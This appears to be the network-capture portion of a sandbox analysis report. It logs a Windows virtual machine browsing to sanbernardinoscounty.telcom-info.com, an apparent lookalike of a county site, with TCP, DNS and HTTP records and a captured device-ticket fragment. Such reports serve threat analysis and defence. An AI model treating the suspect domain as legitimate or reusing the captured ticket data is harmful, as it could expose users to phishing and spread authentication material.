                                                                          Oct 2, 2024 00:43:18.649385929 CEST49810443192.168.2.6104.21.55.67
                                                                          Oct 2, 2024 00:43:18.649389029 CEST44349810104.21.55.67192.168.2.6
                                                                          Oct 2, 2024 00:43:18.649415016 CEST44349810104.21.55.67192.168.2.6
                                                                          Oct 2, 2024 00:43:18.649435043 CEST49810443192.168.2.6104.21.55.67
                                                                          Oct 2, 2024 00:43:18.649522066 CEST44349810104.21.55.67192.168.2.6
                                                                          Oct 2, 2024 00:43:18.649558067 CEST49810443192.168.2.6104.21.55.67
                                                                          Oct 2, 2024 00:43:18.649564981 CEST44349810104.21.55.67192.168.2.6
                                                                          Oct 2, 2024 00:43:18.649599075 CEST49810443192.168.2.6104.21.55.67
                                                                          Oct 2, 2024 00:43:18.649981022 CEST44349810104.21.55.67192.168.2.6
                                                                          Oct 2, 2024 00:43:18.654093027 CEST44349810104.21.55.67192.168.2.6
                                                                          Oct 2, 2024 00:43:18.654124975 CEST44349810104.21.55.67192.168.2.6
                                                                          Oct 2, 2024 00:43:18.654161930 CEST49810443192.168.2.6104.21.55.67
                                                                          Oct 2, 2024 00:43:18.654167891 CEST44349810104.21.55.67192.168.2.6
                                                                          Oct 2, 2024 00:43:18.654305935 CEST49810443192.168.2.6104.21.55.67
                                                                          Oct 2, 2024 00:43:18.743637085 CEST44349810104.21.55.67192.168.2.6
                                                                          Oct 2, 2024 00:43:18.743704081 CEST44349810104.21.55.67192.168.2.6
                                                                          Oct 2, 2024 00:43:18.743763924 CEST44349810104.21.55.67192.168.2.6
                                                                          Oct 2, 2024 00:43:18.743783951 CEST49810443192.168.2.6104.21.55.67
                                                                          Oct 2, 2024 00:43:18.743835926 CEST49810443192.168.2.6104.21.55.67
                                                                          Oct 2, 2024 00:43:19.077405930 CEST49808443192.168.2.6104.21.55.67
                                                                          Oct 2, 2024 00:43:19.077455997 CEST44349808104.21.55.67192.168.2.6
                                                                          Oct 2, 2024 00:43:19.078697920 CEST49809443192.168.2.6104.21.55.67
                                                                          Oct 2, 2024 00:43:19.078769922 CEST44349809104.21.55.67192.168.2.6
                                                                          Oct 2, 2024 00:43:19.080995083 CEST49810443192.168.2.6104.21.55.67
                                                                          Oct 2, 2024 00:43:19.081011057 CEST44349810104.21.55.67192.168.2.6
                                                                          Oct 2, 2024 00:43:19.082060099 CEST49811443192.168.2.6104.21.55.67
                                                                          Oct 2, 2024 00:43:19.082086086 CEST44349811104.21.55.67192.168.2.6
                                                                          Oct 2, 2024 00:43:19.087157011 CEST49812443192.168.2.6104.21.55.67
                                                                          Oct 2, 2024 00:43:19.087184906 CEST44349812104.21.55.67192.168.2.6
                                                                          Oct 2, 2024 00:43:31.399579048 CEST49813443192.168.2.6104.21.55.67
                                                                          Oct 2, 2024 00:43:31.399630070 CEST44349813104.21.55.67192.168.2.6
                                                                          Oct 2, 2024 00:43:31.399755001 CEST49813443192.168.2.6104.21.55.67
                                                                          Oct 2, 2024 00:43:31.400374889 CEST49813443192.168.2.6104.21.55.67
                                                                          Oct 2, 2024 00:43:31.400386095 CEST44349813104.21.55.67192.168.2.6
                                                                          Oct 2, 2024 00:43:31.864283085 CEST44349813104.21.55.67192.168.2.6
                                                                          Oct 2, 2024 00:43:31.864586115 CEST49813443192.168.2.6104.21.55.67
                                                                          Oct 2, 2024 00:43:31.864614964 CEST44349813104.21.55.67192.168.2.6
                                                                          Oct 2, 2024 00:43:31.865739107 CEST44349813104.21.55.67192.168.2.6
                                                                          Oct 2, 2024 00:43:31.865879059 CEST49813443192.168.2.6104.21.55.67
                                                                          Oct 2, 2024 00:43:31.866128922 CEST49813443192.168.2.6104.21.55.67
                                                                          Oct 2, 2024 00:43:31.866178989 CEST49813443192.168.2.6104.21.55.67
                                                                          Oct 2, 2024 00:43:31.866198063 CEST44349813104.21.55.67192.168.2.6
                                                                          Oct 2, 2024 00:43:31.866224051 CEST49813443192.168.2.6104.21.55.67
                                                                          Oct 2, 2024 00:43:31.866286039 CEST49813443192.168.2.6104.21.55.67
                                                                          Oct 2, 2024 00:43:31.866514921 CEST49814443192.168.2.6104.21.55.67
                                                                          Oct 2, 2024 00:43:31.866544008 CEST44349814104.21.55.67192.168.2.6
                                                                          Oct 2, 2024 00:43:31.866616011 CEST49814443192.168.2.6104.21.55.67
                                                                          Oct 2, 2024 00:43:31.866823912 CEST49814443192.168.2.6104.21.55.67
                                                                          Oct 2, 2024 00:43:31.866838932 CEST44349814104.21.55.67192.168.2.6
                                                                          Oct 2, 2024 00:43:32.350574017 CEST44349814104.21.55.67192.168.2.6
                                                                          Oct 2, 2024 00:43:32.350867987 CEST49814443192.168.2.6104.21.55.67
                                                                          Oct 2, 2024 00:43:32.350893974 CEST44349814104.21.55.67192.168.2.6
                                                                          Oct 2, 2024 00:43:32.351612091 CEST44349814104.21.55.67192.168.2.6
                                                                          Oct 2, 2024 00:43:32.352206945 CEST49814443192.168.2.6104.21.55.67
                                                                          Oct 2, 2024 00:43:32.352289915 CEST44349814104.21.55.67192.168.2.6
                                                                          Oct 2, 2024 00:43:32.396423101 CEST49814443192.168.2.6104.21.55.67
                                                                          Oct 2, 2024 00:43:37.467861891 CEST49816443192.168.2.640.115.3.253
                                                                          Oct 2, 2024 00:43:37.467931032 CEST4434981640.115.3.253192.168.2.6
                                                                          Oct 2, 2024 00:43:37.467999935 CEST49816443192.168.2.640.115.3.253
                                                                          Oct 2, 2024 00:43:37.468677998 CEST49816443192.168.2.640.115.3.253
                                                                          Oct 2, 2024 00:43:37.468696117 CEST4434981640.115.3.253192.168.2.6
                                                                          Oct 2, 2024 00:43:38.395149946 CEST4434981640.115.3.253192.168.2.6
                                                                          Oct 2, 2024 00:43:38.395410061 CEST49816443192.168.2.640.115.3.253
                                                                          Oct 2, 2024 00:43:38.397255898 CEST49816443192.168.2.640.115.3.253
                                                                          Oct 2, 2024 00:43:38.397269011 CEST4434981640.115.3.253192.168.2.6
                                                                          Oct 2, 2024 00:43:38.397550106 CEST4434981640.115.3.253192.168.2.6
                                                                          Oct 2, 2024 00:43:38.400616884 CEST49816443192.168.2.640.115.3.253
                                                                          Oct 2, 2024 00:43:38.400765896 CEST49816443192.168.2.640.115.3.253
                                                                          Oct 2, 2024 00:43:38.400773048 CEST4434981640.115.3.253192.168.2.6
                                                                          Oct 2, 2024 00:43:38.400907993 CEST49816443192.168.2.640.115.3.253
                                                                          Oct 2, 2024 00:43:38.447407007 CEST4434981640.115.3.253192.168.2.6
                                                                          Oct 2, 2024 00:43:38.573563099 CEST4434981640.115.3.253192.168.2.6
                                                                          Oct 2, 2024 00:43:38.573656082 CEST4434981640.115.3.253192.168.2.6
                                                                          Oct 2, 2024 00:43:38.577727079 CEST49816443192.168.2.640.115.3.253
                                                                          Oct 2, 2024 00:43:38.582473993 CEST49816443192.168.2.640.115.3.253
                                                                          Oct 2, 2024 00:43:38.582500935 CEST4434981640.115.3.253192.168.2.6
                                                                          Oct 2, 2024 00:43:47.039627075 CEST49818443192.168.2.6216.58.206.36
                                                                          Oct 2, 2024 00:43:47.039736032 CEST44349818216.58.206.36192.168.2.6
                                                                          Oct 2, 2024 00:43:47.040112972 CEST49818443192.168.2.6216.58.206.36
                                                                          Oct 2, 2024 00:43:47.040183067 CEST49818443192.168.2.6216.58.206.36
                                                                          Oct 2, 2024 00:43:47.040205002 CEST44349818216.58.206.36192.168.2.6
                                                                          Oct 2, 2024 00:43:47.302990913 CEST44349814104.21.55.67192.168.2.6
                                                                          Oct 2, 2024 00:43:47.303050995 CEST44349814104.21.55.67192.168.2.6
                                                                          Oct 2, 2024 00:43:47.303220034 CEST49814443192.168.2.6104.21.55.67
                                                                          Oct 2, 2024 00:43:47.680016041 CEST44349818216.58.206.36192.168.2.6
                                                                          Oct 2, 2024 00:43:47.680324078 CEST49818443192.168.2.6216.58.206.36
                                                                          Oct 2, 2024 00:43:47.680352926 CEST44349818216.58.206.36192.168.2.6
                                                                          Oct 2, 2024 00:43:47.680660009 CEST44349818216.58.206.36192.168.2.6
                                                                          Oct 2, 2024 00:43:47.681046963 CEST49818443192.168.2.6216.58.206.36
                                                                          Oct 2, 2024 00:43:47.681123972 CEST44349818216.58.206.36192.168.2.6
                                                                          Oct 2, 2024 00:43:47.725645065 CEST49818443192.168.2.6216.58.206.36
                                                                          Oct 2, 2024 00:43:48.759983063 CEST49814443192.168.2.6104.21.55.67
                                                                          Oct 2, 2024 00:43:48.760059118 CEST44349814104.21.55.67192.168.2.6
                                                                          Oct 2, 2024 00:43:57.613670111 CEST44349818216.58.206.36192.168.2.6
                                                                          Oct 2, 2024 00:43:57.613745928 CEST44349818216.58.206.36192.168.2.6
                                                                          Oct 2, 2024 00:43:57.613817930 CEST49818443192.168.2.6216.58.206.36
                                                                          Oct 2, 2024 00:43:58.791641951 CEST49818443192.168.2.6216.58.206.36
                                                                          Oct 2, 2024 00:43:58.791687012 CEST44349818216.58.206.36192.168.2.6
                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Oct 2, 2024 00:42:42.440888882 CEST53525031.1.1.1192.168.2.6
                                                                          Oct 2, 2024 00:42:42.627887964 CEST53569041.1.1.1192.168.2.6
                                                                          Oct 2, 2024 00:42:43.932234049 CEST53654411.1.1.1192.168.2.6
                                                                          Oct 2, 2024 00:42:44.137379885 CEST5881553192.168.2.61.1.1.1
                                                                          Oct 2, 2024 00:42:44.140862942 CEST6470753192.168.2.61.1.1.1
                                                                          Oct 2, 2024 00:42:44.149029970 CEST53588151.1.1.1192.168.2.6
                                                                          Oct 2, 2024 00:42:44.155436993 CEST53647071.1.1.1192.168.2.6
                                                                          Oct 2, 2024 00:42:46.337467909 CEST5767153192.168.2.61.1.1.1
                                                                          Oct 2, 2024 00:42:46.337937117 CEST5860453192.168.2.61.1.1.1
                                                                          Oct 2, 2024 00:42:46.339207888 CEST4957853192.168.2.61.1.1.1
                                                                          Oct 2, 2024 00:42:46.339709997 CEST6172453192.168.2.61.1.1.1
                                                                          Oct 2, 2024 00:42:46.347489119 CEST53586041.1.1.1192.168.2.6
                                                                          Oct 2, 2024 00:42:46.347503901 CEST53576711.1.1.1192.168.2.6
                                                                          Oct 2, 2024 00:42:46.348356962 CEST53495781.1.1.1192.168.2.6
                                                                          Oct 2, 2024 00:42:46.350578070 CEST53617241.1.1.1192.168.2.6
                                                                          Oct 2, 2024 00:42:46.974550009 CEST5603053192.168.2.61.1.1.1
                                                                          Oct 2, 2024 00:42:46.974680901 CEST5838953192.168.2.61.1.1.1
                                                                          Oct 2, 2024 00:42:46.983314991 CEST53560301.1.1.1192.168.2.6
                                                                          Oct 2, 2024 00:42:46.983828068 CEST53583891.1.1.1192.168.2.6
                                                                          Oct 2, 2024 00:42:48.050491095 CEST5457253192.168.2.61.1.1.1
                                                                          Oct 2, 2024 00:42:48.050621033 CEST5812953192.168.2.61.1.1.1
                                                                          Oct 2, 2024 00:42:48.059108019 CEST53545721.1.1.1192.168.2.6
                                                                          Oct 2, 2024 00:42:48.060872078 CEST53581291.1.1.1192.168.2.6
                                                                          Oct 2, 2024 00:42:49.042344093 CEST4956353192.168.2.61.1.1.1
                                                                          Oct 2, 2024 00:42:49.042552948 CEST5669953192.168.2.61.1.1.1
                                                                          Oct 2, 2024 00:42:49.049532890 CEST5511753192.168.2.61.1.1.1
                                                                          Oct 2, 2024 00:42:49.049988985 CEST5317653192.168.2.61.1.1.1
                                                                          Oct 2, 2024 00:42:49.052719116 CEST53566991.1.1.1192.168.2.6
                                                                          Oct 2, 2024 00:42:49.052931070 CEST53495631.1.1.1192.168.2.6
                                                                          Oct 2, 2024 00:42:49.060719013 CEST53551171.1.1.1192.168.2.6
                                                                          Oct 2, 2024 00:42:49.061614990 CEST53531761.1.1.1192.168.2.6
                                                                          Oct 2, 2024 00:42:49.137079000 CEST5093953192.168.2.61.1.1.1
                                                                          Oct 2, 2024 00:42:49.137454033 CEST6380153192.168.2.61.1.1.1
                                                                          Oct 2, 2024 00:42:49.146059036 CEST53509391.1.1.1192.168.2.6
                                                                          Oct 2, 2024 00:42:49.147159100 CEST53638011.1.1.1192.168.2.6
                                                                          Oct 2, 2024 00:43:01.764357090 CEST53623481.1.1.1192.168.2.6
                                                                          Oct 2, 2024 00:43:09.571266890 CEST5985753192.168.2.61.1.1.1
                                                                          Oct 2, 2024 00:43:09.571427107 CEST5060153192.168.2.61.1.1.1
                                                                          Oct 2, 2024 00:43:09.579906940 CEST53598571.1.1.1192.168.2.6
                                                                          Oct 2, 2024 00:43:09.581295013 CEST53506011.1.1.1192.168.2.6
                                                                          Oct 2, 2024 00:43:15.533632994 CEST53530631.1.1.1192.168.2.6
                                                                          Oct 2, 2024 00:43:20.826504946 CEST53567381.1.1.1192.168.2.6
                                                                          Oct 2, 2024 00:43:42.166079044 CEST53575611.1.1.1192.168.2.6
                                                                          Oct 2, 2024 00:43:43.343981028 CEST53504901.1.1.1192.168.2.6
                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                          Oct 2, 2024 00:42:44.137379885 CEST192.168.2.61.1.1.10xccb9Standard query (0)sanbernardinoscounty.telcom-info.comA (IP address)IN (0x0001)false
                                                                          Oct 2, 2024 00:42:44.140862942 CEST192.168.2.61.1.1.10xf462Standard query (0)sanbernardinoscounty.telcom-info.com65IN (0x0001)false
                                                                          Oct 2, 2024 00:42:46.337467909 CEST192.168.2.61.1.1.10xbd29Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                          Oct 2, 2024 00:42:46.337937117 CEST192.168.2.61.1.1.10x783Standard query (0)code.jquery.com65IN (0x0001)false
                                                                          Oct 2, 2024 00:42:46.339207888 CEST192.168.2.61.1.1.10xbaddStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                          Oct 2, 2024 00:42:46.339709997 CEST192.168.2.61.1.1.10xd0e2Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                          Oct 2, 2024 00:42:46.974550009 CEST192.168.2.61.1.1.10xb94bStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                          Oct 2, 2024 00:42:46.974680901 CEST192.168.2.61.1.1.10x737eStandard query (0)www.google.com65IN (0x0001)false
                                                                          Oct 2, 2024 00:42:48.050491095 CEST192.168.2.61.1.1.10x9797Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                          Oct 2, 2024 00:42:48.050621033 CEST192.168.2.61.1.1.10xe32cStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                          Oct 2, 2024 00:42:49.042344093 CEST192.168.2.61.1.1.10xa84aStandard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                          Oct 2, 2024 00:42:49.042552948 CEST192.168.2.61.1.1.10x42eaStandard query (0)code.jquery.com65IN (0x0001)false
                                                                          Oct 2, 2024 00:42:49.049532890 CEST192.168.2.61.1.1.10xe026Standard query (0)sanbernardinoscounty.telcom-info.comA (IP address)IN (0x0001)false
                                                                          Oct 2, 2024 00:42:49.049988985 CEST192.168.2.61.1.1.10xcb7eStandard query (0)sanbernardinoscounty.telcom-info.com65IN (0x0001)false
                                                                          Oct 2, 2024 00:42:49.137079000 CEST192.168.2.61.1.1.10x4b21Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                          Oct 2, 2024 00:42:49.137454033 CEST192.168.2.61.1.1.10xe048Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                          Oct 2, 2024 00:43:09.571266890 CEST192.168.2.61.1.1.10x1a74Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                          Oct 2, 2024 00:43:09.571427107 CEST192.168.2.61.1.1.10x9d0aStandard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                          Oct 2, 2024 00:42:44.149029970 CEST1.1.1.1192.168.2.60xccb9No error (0)sanbernardinoscounty.telcom-info.com104.21.55.67A (IP address)IN (0x0001)false
                                                                          Oct 2, 2024 00:42:44.149029970 CEST1.1.1.1192.168.2.60xccb9No error (0)sanbernardinoscounty.telcom-info.com172.67.170.156A (IP address)IN (0x0001)false
                                                                          Oct 2, 2024 00:42:44.155436993 CEST1.1.1.1192.168.2.60xf462No error (0)sanbernardinoscounty.telcom-info.com65IN (0x0001)false
                                                                          Oct 2, 2024 00:42:46.347503901 CEST1.1.1.1192.168.2.60xbd29No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                          Oct 2, 2024 00:42:46.347503901 CEST1.1.1.1192.168.2.60xbd29No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                          Oct 2, 2024 00:42:46.347503901 CEST1.1.1.1192.168.2.60xbd29No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                          Oct 2, 2024 00:42:46.347503901 CEST1.1.1.1192.168.2.60xbd29No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                          Oct 2, 2024 00:42:46.348356962 CEST1.1.1.1192.168.2.60xbaddNo error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                          Oct 2, 2024 00:42:46.348356962 CEST1.1.1.1192.168.2.60xbaddNo error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                          Oct 2, 2024 00:42:46.350578070 CEST1.1.1.1192.168.2.60xd0e2No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                          Oct 2, 2024 00:42:46.983314991 CEST1.1.1.1192.168.2.60xb94bNo error (0)www.google.com216.58.206.36A (IP address)IN (0x0001)false
                                                                          Oct 2, 2024 00:42:46.983828068 CEST1.1.1.1192.168.2.60x737eNo error (0)www.google.com65IN (0x0001)false
                                                                          Oct 2, 2024 00:42:48.059108019 CEST1.1.1.1192.168.2.60x9797No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                          Oct 2, 2024 00:42:48.059108019 CEST1.1.1.1192.168.2.60x9797No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                          Oct 2, 2024 00:42:48.060872078 CEST1.1.1.1192.168.2.60xe32cNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                          Oct 2, 2024 00:42:49.052931070 CEST1.1.1.1192.168.2.60xa84aNo error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                          Oct 2, 2024 00:42:49.052931070 CEST1.1.1.1192.168.2.60xa84aNo error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                          Oct 2, 2024 00:42:49.052931070 CEST1.1.1.1192.168.2.60xa84aNo error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                          Oct 2, 2024 00:42:49.052931070 CEST1.1.1.1192.168.2.60xa84aNo error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                          Oct 2, 2024 00:42:49.060719013 CEST1.1.1.1192.168.2.60xe026No error (0)sanbernardinoscounty.telcom-info.com104.21.55.67A (IP address)IN (0x0001)false
                                                                          Oct 2, 2024 00:42:49.060719013 CEST1.1.1.1192.168.2.60xe026No error (0)sanbernardinoscounty.telcom-info.com172.67.170.156A (IP address)IN (0x0001)false
                                                                          Oct 2, 2024 00:42:49.061614990 CEST1.1.1.1192.168.2.60xcb7eNo error (0)sanbernardinoscounty.telcom-info.com65IN (0x0001)false
                                                                          Oct 2, 2024 00:42:49.146059036 CEST1.1.1.1192.168.2.60x4b21No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                          Oct 2, 2024 00:42:49.146059036 CEST1.1.1.1192.168.2.60x4b21No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                          Oct 2, 2024 00:42:49.147159100 CEST1.1.1.1192.168.2.60xe048No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                          Oct 2, 2024 00:42:56.364861965 CEST1.1.1.1192.168.2.60x5554No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                          Oct 2, 2024 00:42:56.364861965 CEST1.1.1.1192.168.2.60x5554No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                          Oct 2, 2024 00:43:09.579906940 CEST1.1.1.1192.168.2.60x1a74No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                          Oct 2, 2024 00:43:17.092493057 CEST1.1.1.1192.168.2.60xa3e8No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                          Oct 2, 2024 00:43:17.092493057 CEST1.1.1.1192.168.2.60xa3e8No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                          Oct 2, 2024 00:43:35.908041000 CEST1.1.1.1192.168.2.60xbd7dNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                          Oct 2, 2024 00:43:35.908041000 CEST1.1.1.1192.168.2.60xbd7dNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                          Oct 2, 2024 00:43:55.690253973 CEST1.1.1.1192.168.2.60x4443No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                          Oct 2, 2024 00:43:55.690253973 CEST1.1.1.1192.168.2.60x4443No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                          • sanbernardinoscounty.telcom-info.com
                                                                          • https:
                                                                            • code.jquery.com
                                                                            • challenges.cloudflare.com
                                                                          • fs.microsoft.com
                                                                          • a.nel.cloudflare.com
                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          0192.168.2.64970940.115.3.253443
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-10-01 22:42:42 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 6a 35 7a 43 75 39 35 6c 37 55 75 66 6e 6e 34 41 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 64 30 37 39 34 37 32 39 32 38 63 62 32 66 39 30 0d 0a 0d 0a
                                                                          Data Ascii: CNT 1 CON 305MS-CV: j5zCu95l7Uufnn4A.1Context: d079472928cb2f90
                                                                          2024-10-01 22:42:42 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                          Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                          2024-10-01 22:42:42 UTC1076OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 35 33 0d 0a 4d 53 2d 43 56 3a 20 6a 35 7a 43 75 39 35 6c 37 55 75 66 6e 6e 34 41 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 64 30 37 39 34 37 32 39 32 38 63 62 32 66 39 30 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 77 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 58 7a 55 45 6b 33 4e 66 59 68 39 44 37 4a 45 5a 56 62 6c 51 70 7a 62 55 68 49 35 31 6e 4c 71 31 6c 79 78 73 49 65 70 6c 50 58 6f 72 4f 79 52 49 56 48 6e 75 53 2b 51 69 6e 32 63 6a 51 38 47 78 6c 52 66 65 2f 66 72 53 38 6e 4e 35 33 45 6b 50 56 49 67 5a 54 76 4c 63 7a 43 74 4b 2f 74 4b 78 6b 4e 6c 45 66 39 33 48 61 4b 43 39 4b
                                                                          Data Ascii: ATH 2 CON\DEVICE 1053MS-CV: j5zCu95l7Uufnn4A.2Context: d079472928cb2f90<device><compact-ticket>t=EwCwAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAXzUEk3NfYh9D7JEZVblQpzbUhI51nLq1lyxsIeplPXorOyRIVHnuS+Qin2cjQ8GxlRfe/frS8nN53EkPVIgZTvLczCtK/tKxkNlEf93HaKC9K
                                                                          2024-10-01 22:42:42 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 6a 35 7a 43 75 39 35 6c 37 55 75 66 6e 6e 34 41 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 64 30 37 39 34 37 32 39 32 38 63 62 32 66 39 30 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                          Data Ascii: BND 3 CON\WNS 0 197MS-CV: j5zCu95l7Uufnn4A.3Context: d079472928cb2f90<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                          2024-10-01 22:42:42 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                          Data Ascii: 202 1 CON 58
                                                                          2024-10-01 22:42:42 UTC58INData Raw: 4d 53 2d 43 56 3a 20 62 47 39 44 73 4f 68 46 68 30 71 69 4f 6f 39 39 61 33 2b 71 59 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                          Data Ascii: MS-CV: bG9DsOhFh0qiOo99a3+qYw.0Payload parsing failed.


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          1192.168.2.649718104.21.55.674434864C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-10-01 22:42:45 UTC679OUTGET / HTTP/1.1
                                                                          Host: sanbernardinoscounty.telcom-info.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Upgrade-Insecure-Requests: 1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: navigate
                                                                          Sec-Fetch-User: ?1
                                                                          Sec-Fetch-Dest: document
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-10-01 22:42:45 UTC816INHTTP/1.1 200 OK
                                                                          Date: Tue, 01 Oct 2024 22:42:45 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                          Pragma: no-cache
                                                                          X-Frame-Options: DENY
                                                                          Set-Cookie: PHPSESSID=d2b586c48e6c37e4b46c75c985eb61c5; path=/
                                                                          cf-cache-status: DYNAMIC
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=l8OYnPB5035J5gjeqFXyC7hO%2F0SwGWFILtU99TpqkWAb2Ayr7Ty9QVZPUNr0uVKat0CmQZs8%2FzVj3IJlYynIz0MA1hBm5OTC6hF7k79%2FJ6lnW6yJDrMHinHXRR5sVt7KOialtG%2BS1oeq2pQL%2Fc0NMsvZkMikZi8%3D"}],"group":"cf-nel","max_age":604800}
